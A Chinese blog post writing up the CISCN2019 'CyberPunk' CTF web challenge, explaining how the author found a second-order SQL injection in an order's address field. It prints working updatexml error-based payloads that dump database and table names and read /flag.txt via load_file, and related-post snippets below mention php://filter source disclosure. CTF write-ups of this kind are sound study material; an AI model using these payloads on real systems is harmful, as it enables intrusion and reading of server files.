[CISCN2019 华北赛区 Day1 Web5]CyberPunk --不会编程的崽

于 2024-03-20 07:00:00 发布
阅读量398 收藏 2
点赞数 11
文章标签: 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/daimakunnanhu/article/details/136836560
版权

继续sql,哈哈。我按照我的思路来讲。

四个功能,提交,查找,修改,删除。多半是sql注入,而且又有修改,查找功能。多半还是二次注入。昨天那个修改密码的,也是二次注入。这里需要先找到注入点 姓名 电话 地址三选一。我最先怀疑的是地址,因为无论哪个功能,都需要输入姓名,电话。相反地址才是会因为查询而二次带入sql语句的。再去fuzz一下。似乎,对地址这没什么过滤。要注意,每次订单的名字或者电话不能一样。先构造payload吧

地址:admin'or(updatexml(1,concat(0x7e,database(),0x7e),1))#

然后查询订单,发现原封不动的回显。修改订单试试呢。

 

果然报错了。继续构造就行 。继续爆表

地址:admin'or(updatexml(1,concat(0x7e,(select(table_name)from(information_schema.tables)where(table_schema)like('ctfusers')),0x7e),1))#

然后安装正常思路,应该去爆表。但是,,,我爆了很久,都没发现flag的表。然后又去看了大佬的wp。原来要读取flag.txt文件。

地址:admin'or(updatexml(1,concat(0x7e,right((select(load_file('/flag.txt'))),20),0x7e),1))#

因为这还是存在长度限制。然后我又使用了right函数。读取左边把right函数去掉就行

地址:admin'or(updatexml(1,concat(0x7e,(select(load_file('/flag.txt'))),0x7e),1))#

 

flag就拿到了。然后我又去看来大佬的IP,原来这里还存在文件读取漏洞,可以读取到源码。。。 

看来细节方面还有待提升 

不会编程的崽
关注
  • 11
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[CISCN2019 华北赛区 Day1 Web5]CyberPunk
zxnimud5的专栏
09-11 192
查看页面源代码,在下方发现提示,?file= 使用php伪协议,读index.php,base64转码,下边是原来的源代码,解码后看上边的,从原始代码中可以看到其它几个php文件顺便把他们也读了 index.php <?php ini_set('open_basedir', '/var/www/html/'); // $file = $_GET["file"]; $file = (isset($_GET['file']) ? $_GET['file'] : null); if (isse..
[CISCN2019 华北赛区 Day1 Web5]CyberPunk(php://伪协议,报错注入,二次注入)
xlcvv的博客
04-27 407
进到页面: (说到赛博朋克,tM居然跳票了,令人烦躁) 老规矩F12: 有个hint,见到file就想到了熟悉的php://伪协议,payload: /index.php?file=php://filter/convert.base64-encode/resource=index.php 返回一大串base64编码内容,解码一下: <?php //index.php ini_set('...
cyberpunk-web-page-webm
10-29
cyberpunk-web-page-webm
cyberpunk-vue:for适用于Vue.js的深色样式组件库
04-28
English | 赛博朋克Vue 该项目正在开发中,API可能会进行升级和更改,请暂时...import 'cyberpunk-vue/lib/cyberpunk-vue.css' ; Vue . use ( cyberpunk ) ; // or import { Button , Input // ... } from 'cyber
cyberpunk-2019:emacs需要的Cyber​​punk主题,但也许不值得。
02-05
"cyberpunk-2019"主题就是这样一个针对Emacs的定制化设计,旨在为用户提供一个具有未来感、仿赛博朋克风格的编辑环境。 赛博朋克(Cyberpunk)是一种流行于科幻文化中的子流派,通常与高科技、低生活、反乌托邦的...
cyberpunk-iterm:Term iTerm的骇客色彩计划
05-10
赛博朋克iTerm :alien_monster: iTerm骇客Colorscheme ... 导入cyberpunk.itermcolors 从颜色预设中选择。 :alien_monster: :raising_hands: 学分 向为VS Code创建原始的。 :balance_scale: 执照 :copyright: 。
Cyberpunk-GRUB-Theme:[MIRROR]赛博朋克2077启发了GRUBGRUB2主题
05-27
GRUB Bootloader的Cyber​​punk主题 受赛博朋克2077电子游戏启发的GRUB Bootloader主题。 安装 从下载 提取并运行 sudo ./install.sh 注意:经过测试,最好在1920x1080分辨率下观看
BUUCTF:[CISCN2019 华北赛区 Day1 Web5]CyberPunk
末初的CSDN博客
03-26 2256
F12查看源码,发现存在传参 尝试通过伪协议文件包含读取源码: http://467ceaa4-2e02-46f9-b14a-25ec91a65986.node3.buuoj.cn/?file=php://filter/convert.base64-encode/resource=index.php 发现除了index.php还存在这几个php文件:confirm.php,delete.ph...
BUUCTF-[CISCN2019 华北赛区 Day1 Web5]CyberPunk
AndyNoel的博客
05-13 476
BUUCTF-[CISCN2019 华北赛区 Day1 Web5]CyberPunk 看题 看源码有提示?file=? 文件包含漏洞,可以利用这个漏洞读取源码。 分析 index.php?file=php://filter/read=convert.base64-encode/resource=change.php 挨个读取完后,base64解码后,在change.php发现了一点问题 <?php require_once "config.php"; if(!empty($_POST["us
你能否完全用html语言写一个点击按钮弹出弹窗的代码,注意是赛博朋克风格的
最新发布
03-25
A: <html> <head> <title>Cyberpunk Pop-up</title> <style> body { background-color: #141A2F; font-family: 'Roboto Mono', monospace; color: #8C8C8C; } .container { width: 100%; height: 100vh; display: flex; justify-content: center; align-items: center; } .button { outline: none; border: none; background-color: #7F5AF0; color: #E5E5E5; font-size: 2.5rem; padding: 1.5rem 3.5rem; border-radius: 0.5rem; cursor: pointer; box-shadow: 0 0.25rem 0.5rem rgba(0,0,0,0.1); transition: all 0.2s ease-in-out; } .button:hover { box-shadow: 0 0.5rem 1rem rgba(0,0,0,0.2); transform: translateY(-2px); } .overlay { position: fixed; top: 0; left: 0; width: 100vw; height: 100vh; background-color: rgba(0,0,0,0.75); display: flex; justify-content: center; align-items: center; } .pop-up { background-color: #1B1C28; width: 40%; padding: 3.5rem 5.5rem; border-radius: 0.75rem; box-shadow: 0 0.5rem 1rem rgba(0,0,0,0.2); text-align: center; } h2 { font-size: 2.5rem; margin-bottom: 2rem; } p { font-size: 1.5rem; color: #8C8C8C; margin-bottom: 3rem; } .close { position: absolute; top: 1.5rem; right: 1.5rem; font-size: 2rem; color: #8C8C8C; cursor: pointer; } .close:hover { color: #E5E5E5; } </style> </head> <body> <div class="container"> <button class="button" onclick="openPopUp()">Open Pop-Up</button> <div class="overlay" id="overlay"> <div class="pop-up"> <span class="close" onclick="closePopUp()">✕</span> <h2>Hello World!</h2> <p>This is a cyberpunk styled pop-up.</p> </div> </div> </div> <script> function openPopUp() { document.getElementById("overlay").style.display = "flex"; } function closePopUp() { document.getElementById("overlay").style.display = "none"; } </script> </body> </html>
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值